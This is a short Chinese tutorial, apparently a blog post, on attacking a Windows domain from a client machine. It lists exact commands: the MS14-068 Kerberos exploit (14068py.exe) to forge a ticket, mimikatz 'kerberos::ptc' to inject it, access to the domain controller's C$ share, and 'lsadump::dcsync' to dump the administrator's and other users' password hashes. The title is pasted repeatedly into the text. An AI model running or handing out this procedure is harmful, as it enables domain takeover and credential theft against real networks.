域客户机提权获取域hash值

总步骤:
将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u [email protected] -p “123.com” -s SID号 -d dc1.contoso.com获取[email protected],然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerberos::ptc [email protected]” exit获取票据,然后就可以dir \dc\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域hash值。
一.将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号。

域客户机提权获取域hash值二.再输入14068py.exe -u [email protected] -p “123.com” -s SID号 -d dc1.contoso.com获取[email protected]
域客户机提权获取域hash值三.然后输入klist purge清除所有的票据
域客户机提权获取域hash值四.再输入mimikatz.exe “kerberos::ptc 你刚刚获取的票据名字” exit获取票据
域客户机提权获取域hash值五. 然后就可以dir \域管计算机名\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域管hash值,或者可以更改administrator获取其他用户的hash值。
域客户机提权获取域hash值域客户机提权获取域hash值
配合“内网渗透的域控制命令”链接使用更方便哦